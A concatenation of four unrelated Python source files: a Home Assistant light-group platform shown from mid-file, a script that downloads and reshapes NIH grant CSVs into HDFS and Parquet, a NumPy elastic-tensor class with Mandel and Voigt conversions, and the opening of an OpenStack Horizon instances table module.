vol.Required(CONF_ENTITIES): cv.entities_domain(light.DOMAIN),
}
)
SUPPORT_GROUP_LIGHT = (
SUPPORT_BRIGHTNESS
| SUPPORT_COLOR_TEMP
| SUPPORT_EFFECT
| SUPPORT_FLASH
| SUPPORT_COLOR
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def async_setup_platform(
hass: HomeAssistantType, config: ConfigType, async_add_entities, discovery_info=None
) -> None:
"""Initialize light.group platform."""
async_add_entities(
[LightGroup(cast(str, config.get(CONF_NAME)), config[CONF_ENTITIES])]
)
class LightGroup(light.Light):
"""Representation of a light group."""
def __init__(self, name: str, entity_ids: List[str]) -> None:
"""Initialize a light group."""
self._name = name
self._entity_ids = entity_ids
self._is_on = False
self._available = False
self._brightness: Optional[int] = None
self._hs_color: Optional[Tuple[float, float]] = None
self._color_temp: Optional[int] = None
self._min_mireds: Optional[int] = 154
self._max_mireds: Optional[int] = 500
self._white_value: Optional[int] = None
self._effect_list: Optional[List[str]] = None
self._effect: Optional[str] = None
self._supported_features: int = 0
self._async_unsub_state_changed: Optional[CALLBACK_TYPE] = None
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
@callback
def async_state_changed_listener(
entity_id: str, old_state: State, new_state: State
):
"""Handle child updates."""
self.async_schedule_update_ha_state(True)
assert self.hass is not None
self._async_unsub_state_changed = async_track_state_change(
self.hass, self._entity_ids, async_state_changed_listener
)
await self.async_update()
async def async_will_remove_from_hass(self):
"""Handle removal from Home Assistant."""
if self._async_unsub_state_changed is not None:
self._async_unsub_state_changed()
self._async_unsub_state_changed = None
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._name
@property
def is_on(self) -> bool:
"""Return the on/off state of the light group."""
return self._is_on
@property
def available(self) -> bool:
"""Return whether the light group is available."""
return self._available
@property
def brightness(self) -> Optional[int]:
"""Return the brightness of this light group between 0..255."""
return self._brightness
@property
def hs_color(self) -> Optional[Tuple[float, float]]:
"""Return the HS color value [float, float]."""
return self._hs_color
@property
def color_temp(self) -> Optional[int]:
"""Return the CT color value in mireds."""
return self._color_temp
@property
def min_mireds(self) -> Optional[int]:
"""Return the coldest color_temp that this light group supports."""
return self._min_mireds
@property
def max_mireds(self) -> Optional[int]:
"""Return the warmest color_temp that this light group supports."""
return self._max_mireds
@property
def white_value(self) -> Optional[int]:
"""Return the white value of this light group between 0..255."""
return self._white_value
@property
def effect_list(self) -> Optional[List[str]]:
"""Return the list of supported effects."""
return self._effect_list
@property
def effect(self) -> Optional[str]:
"""Return the current effect."""
return self._effect
@property
def supported_features(self) -> int:
"""Flag supported features."""
return self._supported_features
@property
def should_poll(self) -> bool:
"""No polling needed for a light group."""
return False
async def async_turn_on(self, **kwargs):
"""Forward the turn_on command to all lights in the light group."""
data = {ATTR_ENTITY_ID: self._entity_ids}
emulate_color_temp_entity_ids = []
if ATTR_BRIGHTNESS in kwargs:
data[ATTR_BRIGHTNESS] = kwargs[ATTR_BRIGHTNESS]
if ATTR_HS_COLOR in kwargs:
data[ATTR_HS_COLOR] = kwargs[ATTR_HS_COLOR]
if ATTR_COLOR_TEMP in kwargs:
data[ATTR_COLOR_TEMP] = kwargs[ATTR_COLOR_TEMP]
# Create a new entity list to mutate
updated_entities = list(self._entity_ids)
# Walk through initial entity ids, split entity lists by support
for entity_id in self._entity_ids:
state = self.hass.states.get(entity_id)
if not state:
continue
support = state.attributes.get(ATTR_SUPPORTED_FEATURES)
# Only pass color temperature to supported entity_ids
if bool(support & SUPPORT_COLOR) and not bool(
support & SUPPORT_COLOR_TEMP
):
emulate_color_temp_entity_ids.append(entity_id)
updated_entities.remove(entity_id)
data[ATTR_ENTITY_ID] = updated_entities
if ATTR_WHITE_VALUE in kwargs:
data[ATTR_WHITE_VALUE] = kwargs[ATTR_WHITE_VALUE]
if ATTR_EFFECT in kwargs:
data[ATTR_EFFECT] = kwargs[ATTR_EFFECT]
if ATTR_TRANSITION in kwargs:
data[ATTR_TRANSITION] = kwargs[ATTR_TRANSITION]
if ATTR_FLASH in kwargs:
data[ATTR_FLASH] = kwargs[ATTR_FLASH]
if not emulate_color_temp_entity_ids:
await self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_ON, data, blocking=True
)
return
emulate_color_temp_data = data.copy()
temp_k = color_util.color_temperature_mired_to_kelvin(
emulate_color_temp_data[ATTR_COLOR_TEMP]
)
hs_color = color_util.color_temperature_to_hs(temp_k)
emulate_color_temp_data[ATTR_HS_COLOR] = hs_color
del emulate_color_temp_data[ATTR_COLOR_TEMP]
emulate_color_temp_data[ATTR_ENTITY_ID] = emulate_color_temp_entity_ids
await asyncio.gather(
self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_ON, data, blocking=True
),
self.hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_ON,
emulate_color_temp_data,
blocking=True,
),
)
async def async_turn_off(self, **kwargs):
"""Forward the turn_off command to all lights in the light group."""
data = {ATTR_ENTITY_ID: self._entity_ids}
if ATTR_TRANSITION in kwargs:
data[ATTR_TRANSITION] = kwargs[ATTR_TRANSITION]
await self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_OFF, data, blocking=True
)
async def async_update(self):
"""Query all members and determine the light group state."""
all_states = [self.hass.states.get(x) for x in self._entity_ids]
states: List[State] = list(filter(None, all_states))
on_states = [state for state in states if state.state == STATE_ON]
self._is_on = len(on_states) > 0
self._available = any(state.state != STATE_UNAVAILABLE for state in states)
self._brightness = _reduce_attribute(on_states, ATTR_BRIGHTNESS)
self._hs_color = _reduce_attribute(on_states, ATTR_HS_COLOR, reduce=_mean_tuple)
self._white_value = _reduce_attribute(on_states, ATTR_WHITE_VALUE)
self._color_temp = _reduce_attribute(on_states, ATTR_COLOR_TEMP)
self._min_mireds = _reduce_attribute(
states, ATTR_MIN_MIREDS, default=154, reduce=min
)
self._max_mireds = _reduce_attribute(
states, ATTR_MAX_MIREDS, default=500, reduce=max
)
self._effect_list = None
all_effect_lists = list(_find_state_attributes(states, ATTR_EFFECT_LIST))
if all_effect_lists:
# Merge all effects from all effect_lists with a union merge.
self._effect_list = list(set().union(*all_effect_lists))
self._effect = None
all_effects = list(_find_state_attributes(on_states, ATTR_EFFECT))
if all_effects:
# Report the most common effect.
effects_count = Counter(itertools.chain(all_effects))
self._effect = effects_count.most_common(1)[0][0]
self._supported_features = 0
for support in _find_state_attributes(states, ATTR_SUPPORTED_FEATURES):
# Merge supported features by emulating support for every feature
# we find.
self._supported_features |= support
# Bitwise-and the supported features with the GroupedLight's features
# so that we don't break in the future when a new feature is added.
self._supported_features &= SUPPORT_GROUP_LIGHT
def _find_state_attributes(states: List[State], key: str) -> Iterator[Any]:
"""Find attributes with matching key from states."""
for state in states:
value = state.attributes.get(key)
if value is not None:
yield value
def _mean_int(*args):
"""Return the mean of the supplied values."""
return int(sum(args) / len(args))
def _mean_tuple(*args):
"""Return the mean values along the columns of the supplied values."""
return tuple(sum(l) / len(l) for l in zip(*args))
def _reduce_attribute(
states: List[State],
key: str,
default: Optional[Any] = None,
reduce: Callable[..., Any] = _mean_int,
) -> Any:
"""Find the first attribute matching key from states.
If none are found, return default.
"""
attrs = list(_find_state_attributes(states, key))
if not attrs:
return default
if len(attrs) == 1:
return attrs[0]
return reduce(*attrs)
| |
import sys
from subprocess import call
import pandas as pd
import os
import findspark
findspark.init()
from pyspark.sql import SparkSession
COLNAMES = ['SM_Application_ID', 'Project_Terms', 'Project_Title', 'Department', 'Agency', 'IC_Center',
'Project_Number', 'Project_Start_Date', 'Project_End_Date', 'Contact_PI_Project_Leader', 'Other_PIs',
'Congressional_District', 'DUNS_Number', 'Organizational_Name', 'Organization_City', 'Organization_State',
'Organization_Zip', 'Organization_Country', 'Budget_Start_Date', 'Budget_End_Date', 'CFDA_Code', 'FY',
'FY_Total_Cost', 'FY_Total_Cost_Sub_Projects']
def download_project_csv(year):
url = "https://federalreporter.nih.gov/FileDownload/DownloadFile?fileToDownload=FedRePORTER_PRJ_C_FY" + \
str(year) + ".zip"
filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".zip"
call(['wget', '-O', filename, url])
call(['unzip', '-o', filename])
def download_abstract_csv(year):
url = "https://federalreporter.nih.gov/FileDownload/DownloadFile?fileToDownload=FedRePORTER_PRJABS_C_FY" + \
str(year) + ".zip"
filename = "FedRePORTER_PRJABS_C_FY" + str(year) + ".zip"
call(['wget', '-O', filename, url])
call(['unzip', '-o', filename])
def process_document_csv(year):
filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)
# save the column list into seperate variables
Grants_ID = Grants.SM_Application_ID.tolist() # Grant ID column
Project_Title = Grants.Project_Title.tolist() # Project_Title column
Summary = Grants.Project_Terms.tolist() # Project Summary column
Year = Grants.FY.tolist() # Year column
Start_Date = Grants.Project_Start_Date.tolist() # Start_Date column
End_Date = Grants.Project_End_Date.tolist() # End_Date column
my_dataframe = pd.DataFrame(Grants_ID, columns=["Grant_ID"]) # creating a dataframe from a list
# creating a series
series_title = pd.Series(Project_Title) # series for Project_Title column
series_summary = pd.Series(Summary) # series for Project Summary column
series_year = pd.Series(Year) # series for Year column
series_start = pd.Series(Start_Date) # series for Start_Date column
series_end = pd.Series(End_Date) # series for End_Date column
# adding the series to the dataframe
my_dataframe['Project_Title'] = series_title.values
my_dataframe['Summary'] = series_summary.values
my_dataframe['Year'] = series_year.values
my_dataframe['Start_Date'] = series_start.values
my_dataframe['End_Date'] = series_end.values
# droppng the first row
my_dataframe = my_dataframe.ix[1:]
my_dataframe = my_dataframe.drop('Summary', 1) # removing the summary from the data frame
# reading the abstracts from the abstract files
filename2 = "FedRePORTER_PRJABS_C_FY" + str(year) + ".csv"
colnames_abs = ['SM_Application_ID', 'Abstract']
Grants_abs = pd.read_csv(filename2, header=None, names=colnames_abs, encoding="ISO-8859-1")
# Deleting the first row for the abstract table
Grants_abs = Grants_abs.ix[1:]
# left merge for process_document_csv table
document_merge = pd.merge(left=my_dataframe, right=Grants_abs, how='left'
, left_on='Grant_ID', right_on='SM_Application_ID')
# deleting the redundancy by deleting the column SM_application_ID
document_merge = document_merge.drop('SM_Application_ID', 1) # removing the SM_APPLICATION_ID from the data frame
# creating a new csv and writing the contents from data frame
outputfile = "Grant_Document_" + str(year) + ".csv"
document_merge.to_csv(outputfile, index=False)
# function to process the process_scientist_csv file
def process_scientist_csv(year):
filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)
# processing
# save the column list into seperate variables
Grants_ID = Grants.SM_Application_ID.tolist() # Grant ID column
# split the name into first and the last name
## creating a list
Name_List = Grants.Contact_PI_Project_Leader.tolist()
# Creating a dataframe from a list
my_dataframe_test = pd.DataFrame(Name_List, columns=["Name"])
# deleting the first row from dataframe
my_dataframe_test = my_dataframe_test.ix[1:]
my_dataframe_test['Name'] = my_dataframe_test['Name'].str.replace('.', '')
# replacing commas with space
my_dataframe_test['Name'] = my_dataframe_test['Name'].str.replace('\,', '')
splits = my_dataframe_test['Name'].str.split()
# extract the first and Last Name from the string
Last_Name = splits.str[0] # Last_Name
First_Name = splits.str[1] # First Name
Middle_Name = splits.str[2] # Middle Name
# contactinate two data frames along the columns
my_dataframe_scientist = pd.concat([First_Name, Last_Name, Middle_Name], axis=1)
my_dataframe_scientist.columns = ['First_Name', 'Last_Name', 'Middle_Name']
# adding the Grant ID column to the dataframe
series_grantID = pd.Series(Grants_ID)
series_grantID_2 = series_grantID.drop([0]) # dropping the first value
my_dataframe_scientist['Grant_ID'] = series_grantID_2.values
# add the columns roles to the scienstist dataframe
my_dataframe_scientist['Role'] = pd.Series(['PI' for x in range(len(my_dataframe_scientist.index) + 1)])
len(my_dataframe_scientist.index) + 1
# extracting other PI columns from grant csv file
# save the column list into seperate variables
Other_PIs = Grants.Other_PIs.tolist()
Grant_ID2 = Grants.SM_Application_ID.tolist()
# creating a series
series_other_PIs = pd.Series(Other_PIs)
my_dataframe_sci2 = pd.DataFrame(Grant_ID2, columns=["Grant_ID"]) # creating a dataframe from a list
# adding the series to the dataframe
my_dataframe_sci2['Other_PIs'] = series_other_PIs.values
# deleting the first row from dataframe
my_dataframe_sci2 = my_dataframe_sci2.ix[1:]
# deleting all the null values
my_dataframe_sci2 = my_dataframe_sci2[my_dataframe_sci2.Other_PIs.notnull()]
# replacing the commas with blank value
my_dataframe_sci2['Other_PIs'] = my_dataframe_sci2['Other_PIs'].str.replace('\,', '')
# splitting the columns into rows
my_dataframe_sci3 = pd.concat([pd.Series(row['Grant_ID'], row['Other_PIs'].split(';'))
for _, row in my_dataframe_sci2.iterrows()]).reset_index()
my_dataframe_sci3.columns = ['Other_PIs', 'Grant_ID']
# deleting the rows with blank Value
my_dataframe_sci3 = my_dataframe_sci3[my_dataframe_sci3.Other_PIs != ' ']
# replacing commas with space
my_dataframe_sci3['Other_PIs'] = my_dataframe_sci3['Other_PIs'].str.replace('\.', '')
my_dataframe_sci3 = my_dataframe_sci3[my_dataframe_sci3.Other_PIs != '']
splits2 = my_dataframe_sci3['Other_PIs'].str.split()
# extract the first and Last Name from the string
Last_Name2 = splits2.str[0] # Last_Name
First_Name2 = splits2.str[1] # First Name
Middle_Name2 = splits2.str[2] # Middle Name
# contactinate two data frames along the columns
my_dataframe_sci4 = pd.concat([First_Name2, Last_Name2, Middle_Name2], axis=1)
my_dataframe_sci4.columns = ['First_Name', 'Last_Name', 'Middle_Name']
GrantID_OT = my_dataframe_sci3.Grant_ID.tolist()
series_GrantID_other = pd.Series(GrantID_OT)
my_dataframe_sci4['Grant_ID'] = series_GrantID_other.values
# add the columns roles to the scienstist dataframe
my_dataframe_sci4['Role'] = 'Other PI'
# concatinate for the final version
# stack the DataFrames on top of each other
my_dataframe_scientist_final = pd.concat([my_dataframe_scientist, my_dataframe_sci4])
# resetting the index
my_dataframe_scientist_final = my_dataframe_scientist_final.reset_index()
del my_dataframe_scientist_final['index']
# to add a new column to dataframe with Scientist_ID
my_dataframe_scientist_final['IM_ID'] = my_dataframe_scientist_final['First_Name'].str[:1].astype(str).str.cat(
my_dataframe_scientist_final['Last_Name'].str[:1].astype(str), sep='')
my_dataframe_scientist_final['Scientist_ID'] = my_dataframe_scientist_final['IM_ID'].astype(str).str.cat(
my_dataframe_scientist_final['Grant_ID'].astype(str), sep='')
# deleting the intermediate column
del my_dataframe_scientist_final['IM_ID']
# creating a new csv and writing the contents from data frame
outputfile = "Grant_Scientist_" + str(year) + ".csv"
# creating a new csv and writing the contents from data frame
my_dataframe_scientist_final.to_csv(outputfile, index=False)
def process_organization_csv(year):
filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)
# processing
# save the column list into seperate variables
Grants_ID = Grants.SM_Application_ID.tolist() # Grant ID column
# save the column list into seperate variables
Organization_Name = Grants.Organizational_Name.tolist() # Organization Name column
Organization_City = Grants.Organization_City.tolist() # Organization City column
Organization_State = Grants.Organization_State.tolist() # Organization State column
Organization_Zip = Grants.Organization_Zip.tolist() # Organization Zip column
# creating an initial dataframe with only Organization Name
my_dataframe_org = pd.DataFrame(Organization_Name,
columns=["Organization_Name"]) # creating a dataframe from a list
# creating a series
series_City = pd.Series(Organization_City) # series for city column
series_State = pd.Series(Organization_State) # series for state column
series_Zip = pd.Series(Organization_Zip) # series for Zip column
# adding the series to the dataframe
my_dataframe_org['Organization_City'] = series_City.values
my_dataframe_org['Organization_State'] = series_State.values
my_dataframe_org['Organization_Zip'] = series_Zip.values
# deleting the first row from dataframe
my_dataframe_org = my_dataframe_org.ix[1:]
# adding the Grant ID column to the dataframe
series_grantID = pd.Series(Grants_ID)
series_grantID_2 = series_grantID.drop([0]) # dropping the first value
my_dataframe_org['Grant_ID'] = series_grantID_2.values
# creating a Organizaton ID column in organizational dataframe
my_dataframe_org['IM_ID2'] = my_dataframe_org['Organization_Name'].str[:2].astype(str).str.cat(
my_dataframe_org['Organization_City'].str[:2].astype(str), sep='')
my_dataframe_org['Org_ID'] = my_dataframe_org['IM_ID2'].astype(str).str.cat(
my_dataframe_org['Grant_ID'].astype(str), sep='')
# deleting the intermediate column
del my_dataframe_org['IM_ID2']
# creating a new csv and writing the contents from data frame
outputfile = "Grant_Organization_" + str(year) + ".csv"
# creating a new csv and writing the contents from data frame
my_dataframe_org.to_csv(outputfile, index=False)
def document_parquet(spark, basepath, year):
fileread = os.path.join(basepath, "Grant_Document_" + str(year) + ".csv")
document_csv = spark.read.format("csv").option("header", "true").load(fileread)
fileout = os.path.join(basepath, "Grant_Document_" + str(year) + ".parquet")
document_csv.write.parquet(fileout)
def scientist_parquet(spark, basepath, year):
fileread = os.path.join(basepath, "Grant_Scientist_" + str(year) + ".csv")
document_sci = spark.read.format("csv").option("header", "true").load(fileread)
fileout = os.path.join(basepath, "Grant_Scientist_" + str(year) + ".parquet")
document_sci.write.parquet(fileout)
def organization_parquet(spark, basepath, year):
fileread = os.path.join(basepath, "Grant_Organization_" + str(year) + ".csv")
document_org = spark.read.format("csv").option("header", "true").load(fileread)
fileout = os.path.join(basepath, "Grant_Organization_" + str(year) + ".parquet")
document_org.write.parquet(fileout)
if __name__ == '__main__':
start_year = int(sys.argv[1])
end_year = int(sys.argv[2])
basepath = sys.argv[3]
spark = SparkSession.builder.getOrCreate()
for year in range(start_year, end_year + 1):
download_project_csv(year)
download_abstract_csv(year)
for year in range(start_year, end_year + 1):
process_document_csv(year)
process_scientist_csv(year)
process_organization_csv(year)
call(' '.join(['hdfs', 'dfs', '-put', 'Grant_Document_*.csv', basepath]), shell=True)
call(' '.join(['hdfs', 'dfs', '-put', 'Grant_Scientist_*.csv', basepath]), shell=True)
call(' ' .join(['hdfs', 'dfs', '-put', 'Grant_Organization_*.csv', basepath]), shell=True)
for year in range(start_year, end_year + 1):
document_parquet(spark, basepath, year)
scientist_parquet(spark, basepath, year)
organization_parquet(spark, basepath, year)
| |
import numpy as np
class ElasticTensor():
"""
This class represents linear fourth-order tensor of elastic parameters
for both stiffness and compliance. It also evaluates the tensor as a matrix
using engineering Mandel's or Voigt's notation. The plane stress or strain
is also available.
"""
def __init__(self, bulk=None, mu=None, stiffness=True, plane=None):
"""
Parameters
----------
bulk : float
bulk modulus
mu : float
shear modulus
stiffness : boolean
determines whether the values are evaluated for stiffness (True)
or for its inverse compliance (False)
plane : None, 'strain', or 'stress'
determines the physical problem; None represents three-dimensional
problem and 'strain' or 'stress' represent reduced problem of plane
strain or stress respectively
"""
if stiffness:
self.stiffness = stiffness
self.val_type = 'stiffness'
else:
self.val_type = 'compliance'
if plane is None:
self.dim = 3
elif plane in ['stress', 'strain']:
self.dim = 2
else:
raise ValueError("This type of plane (%s) is not supported."
% str(plane))
self.plane = plane
self.sym = self.get_sym(self.dim)
self.bulk = float(bulk)
self.mu = float(mu)
# set up values to tensor and matrices
_, volumetric, deviatoric = self.get_decomposition()
if stiffness:
self.val = 3.*bulk*volumetric + 2.*mu*deviatoric
else:
self.val = 1./(3*bulk)*volumetric + 1./(2*mu)*deviatoric
self.mandel = self.create_mandel(self.val)
self.voigt = self.create_voigt(self.val)
if plane is not None:
self.val = self.val[0:2, 0:2, 0:2, 0:2]
if (stiffness and plane == 'strain') or \
(not stiffness and plane == 'stress'):
self.mandel = self.get_plane_in_engineering(self.mandel)
self.voigt = self.get_plane_in_engineering(self.voigt)
elif (not stiffness and plane == 'strain') or \
(stiffness and plane == 'stress'):
inv = np.linalg.inv
self.mandel = inv(self.get_plane_in_engineering(inv(self.mandel)))
self.voigt = inv(self.get_plane_in_engineering(inv(self.voigt)))
else:
pass
@staticmethod
def get_plane_in_engineering(val, ind=None):
"""
get plane (strain or stress) of matrix in Mandel or Voigth notation
Parameters:
val : numpy.ndarray of shape (6,6)
matrix to transfer to plane
ind : list or tuple of len 2
indicies of plane axis
Returns:
mat : numpy.ndarray of shape (3,3)
plane matrix
"""
if ind is None:
ind = [0, 1]
else:
ind = list(ind)
ind_shear = list(range(3))
ind_shear.remove(ind[0])
ind_shear.remove(ind[1])
ind.append(ind_shear[0]+3)
mat = val[ind][:, ind]
return mat
@staticmethod
def get_plane_in_tensor(val, ind=None):
assert(isinstance(val, np.ndarray))
if ind is None:
ind = [0, 1]
if val.shape[:4]==4*(3,): # dimension = 4
mat = val[ind][:,ind][:,:,ind][:,:,:,ind]
elif val.shape[:2]==2*(3,): # dimension = 2
mat = val[ind][:, ind]
else:
raise ValueError('Shape {0} of input!'.format(val.shape))
return mat
def __repr__(self):
ss = "Class: %s\n" % (self.__class__.__name__)
ss += ' stiffness = %s (%s)\n' % (self.stiffness, self.val_type)
ss += ' dim = %d' % (self.dim)
if self.plane is None:
ss += '\n'
else:
ss += ' (plane %s)\n' % self.plane
ss += ' bulk = %s\n' % str(self.bulk)
ss += ' mu = %s\n' % str(self.mu)
return ss
@staticmethod
def get_sym(dim):
return dim*(dim+1)/2
@staticmethod
def get_decomposition():
"""
It produces symmetrized fourth-order identity, hydrostatic, and
deviatoric projections.
Returns
-------
idsym : numpy.array of shape = (3, 3, 3, 3)
symmetrized identity operator
volumetric : numpy.array of shape = (3, 3, 3, 3)
hydrostatic projection
deviatoric : numpy.array of shape = (3, 3, 3, 3)
deviatoric projection
"""
ids = np.eye(3)
volumetric = 1./3*np.einsum('ij,kl', ids, ids)
idsym = 0.5*(np.einsum('ik,jl', ids, ids)
+ np.einsum('il,jk', ids, ids))
deviatoric = idsym - volumetric
return idsym, volumetric, deviatoric
@staticmethod
def create_mandel(mat, ndim=None):
"""
It transfer symmetric four-order tensor (or matrix) to
second order tensor (or vector) using Mandel's notation.
Parameters
----------
mat : numpy.array of shape = (d, d, d, d) or (d, d) for dimension d
fourth-order tensor of elastic parameters
ndim : 2 or 4
dimensionality of input
Returns
-------
res : numpy.array of shape = (sym, sym) or (sym,) for sym = d*(d+1)/2
second-order tensor of elastic parameters with Mandel's notation
"""
dim = mat.shape[0]
sym = int(dim*(dim+1)/2)
if ndim is None:
ndim = mat.ndim
grid_shape = mat.shape[ndim:]
if ndim == 4:
res = np.zeros((sym, sym) + grid_shape, dtype=mat.dtype)
if dim == 3:
for ii, jj in np.ndindex(dim, dim):
kk = list(range(dim))
kk.remove(ii)
ll = list(range(dim))
ll.remove(jj)
res[ii, jj] = mat[ii, ii, jj, jj]
res[ii, jj+dim] = 2**.5*mat[ii, ii, ll[0], ll[1]]
res[jj+dim, ii] = res[ii, jj+dim]
res[ii+dim, jj+dim] = 2*mat[kk[0], kk[1], ll[0], ll[1]]
if dim==2:
res[2,2] = 2*mat[0,1,0,1]
for ii in range(dim):
res[ii,2] = 2**.5*mat[ii,ii,0,1]
res[2,ii] = 2**.5*mat[0,1,ii,ii]
for jj in range(dim):
res[ii, jj] = mat[ii, ii, jj, jj]
elif ndim == 2:
res = np.zeros((sym,) + grid_shape, dtype=mat.dtype)
res[:dim] = np.diag(mat)
if dim == 2:
res[dim] = 2**.5*mat[0, 1]
elif dim == 3:
for ii in np.arange(sym-dim):
ind = list(range(sym-dim))
ind.remove(ii)
res[dim+ii] = 2**.5*mat[ind[0], ind[1]]
else:
raise ValueError("Incorrect dimension (%d)" % dim)
return res
@staticmethod
def dispose_mandel(vec, ndim=2):
assert(isinstance(vec, np.ndarray))
vec = vec.squeeze()
sym = vec.shape[0]
def dimfun(sym):
"""
Inverse function to dim*(dim+1)/2.
"""
return int((-1.+(1+8*sym)**.5)/2)
dim = dimfun(sym)
if ndim is None:
ndim = vec.ndim
grid_shape = vec.shape[ndim:]
if ndim == 2: # matrix -> tensor4
assert(vec.shape[0] == vec.shape[1])
mat = np.zeros(4*(dim,)+grid_shape, dtype=vec.dtype)
if dim==3:
for ii in np.arange(dim):
for jj in np.arange(dim):
kk = list(range(dim))
kk.remove(ii)
ll = list(range(dim))
ll.remove(jj)
mat[ii, ii, jj, jj] = vec[ii, jj]
mat[ii, ii, ll[0], ll[1]] = vec[ii, jj+dim] / 2**.5
mat[ii, ii, ll[1], ll[0]] = vec[ii, jj+dim] / 2**.5
mat[ll[0], ll[1], ii, ii] = mat[ii, ii, ll[0], ll[1]]
mat[ll[1], ll[0], ii, ii] = mat[ii, ii, ll[0], ll[1]]
mat[kk[0], kk[1], ll[0], ll[1]] = vec[ii+dim, jj+dim] / 2.
mat[kk[1], kk[0], ll[0], ll[1]] = vec[ii+dim, jj+dim] / 2.
mat[kk[0], kk[1], ll[1], ll[0]] = vec[ii+dim, jj+dim] / 2.
mat[kk[1], kk[0], ll[1], ll[0]] = vec[ii+dim, jj+dim] / 2.
elif dim==2:
mat[0,1,0,1] = vec[2,2]/2.
mat[0,1,1,0] = vec[2,2]/2.
mat[1,0,0,1] = vec[2,2]/2.
mat[1,0,1,0] = vec[2,2]/2.
for ii in range(dim):
mat[ii,ii,0,1] = vec[ii,2]/2**.5
mat[ii,ii,1,0] = vec[ii,2]/2**.5
mat[0,1,ii,ii] = vec[2,ii]/2**.5
mat[1,0,ii,ii] = vec[2,ii]/2**.5
for jj in range(dim):
mat[ii,ii,jj,jj] = vec[ii,jj]
mat[ii,ii,jj,jj] = vec[ii,jj]
elif ndim == 1: # vector -> matrix
mat = np.diag(vec[:dim])
if dim == 2:
mat[0, 1] = vec[-1]/2**0.5
mat[1, 0] = vec[-1]/2**0.5
elif dim == 3:
for ii in np.arange(sym-dim):
ind = list(range(sym-dim))
ind.remove(ii)
mat[ind[0], ind[1]] = vec[dim+ii]/2.**.5
mat[ind[1], ind[0]] = vec[dim+ii]/2.**.5
else:
raise ValueError("Incorrect dimension (%d)" % dim)
return mat
@staticmethod
def create_voigt(mat, valtype='strain'):
"""
It transfer symmetric four-order tensor to second order tensor
using Voigt's notation.
Parameters
----------
mat : numpy.array of shape = (3, 3, 3, 3)
fourth-order tensor of elastic parameters
valtype : one of 'strain' or 'stress'
this distinguish a engineering notation for strain and stress
Returns
-------
vec : numpy.array of shape = (6, 6)
second-order tensor of elastic parameters with Voigt's notation
"""
dim = mat.shape[0]
sym = int(dim*(dim+1)/2)
if mat.ndim == 4:
vec = np.zeros([sym, sym], dtype=mat.dtype)
for ii in np.arange(dim):
for jj in np.arange(dim):
kk = list(range(dim))
kk.remove(ii)
ll = list(range(dim))
ll.remove(jj)
vec[ii, jj] = mat[ii, ii, jj, jj]
vec[ii, jj+dim] = mat[ii, ii, ll[0], ll[1]]
vec[jj+dim, ii] = vec[ii, jj+dim]
vec[ii+dim, jj+dim] = mat[kk[0], kk[1], ll[0], ll[1]]
elif mat.ndim == 2:
vec = np.zeros(sym, dtype=mat.dtype)
vec[:dim] = np.diag(mat)
if valtype == 'strain':
coef = 2.
elif valtype == 'stress':
coef = 1.
else:
msg = "Parameter valtype (%s) should be one of 'strain' or\
'stress'." % (str(valtype),)
raise ValueError(msg)
if dim == 2:
vec[dim] = coef*mat[0, 1]
elif dim == 3:
for ii in np.arange(sym-dim):
ind = list(range(sym-dim))
ind.remove(ii)
vec[dim+ii] = coef*mat[ind[0], ind[1]]
else:
raise ValueError("Incorrect dimension (%d)" % dim)
return vec
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse # noqa
from django import shortcuts
from django import template
from django.template.defaultfilters import title # noqa
from django.utils.http import urlencode
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat # noqa
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import six
from horizon import conf
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.access_and_security.floating_ips \
import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
LOG = logging.getLogger(__name__)
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
POWER_STATES = {
0: "NO STATE",
1: "RUNNING",
2: "BLOCKED",
3: "PAUSED",
4: "SHUTDOWN",
5: "SHUTOFF",
6: "CRASHED",
7: "SUSPENDED",
8: "FAILED",
9: "BUILDING",
}
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
SHELVE = 0
UNSHELVE = 1
def is_deleting(instance):
task_state = getattr(instance, "OS-EXT-STS:task_state", None)
if not task_state:
return False
return task_state.lower() == "deleting"
class DeleteInstance(policy.PolicyTargetMixin, tables.DeleteAction):
policy_rules = (("compute", "compute:delete"),)
help_text = _("Deleted instances are not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Instance",
u"Delete Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled deletion of Instance",
u"Scheduled deletion of Instances",
count
)
def allowed(self, request, instance=None):
"""Allow delete action if instance is in error state or not currently
being deleted.
"""
error_state = False
if instance:
error_state = (instance.status == 'ERROR')
return error_state or not is_deleting(instance)
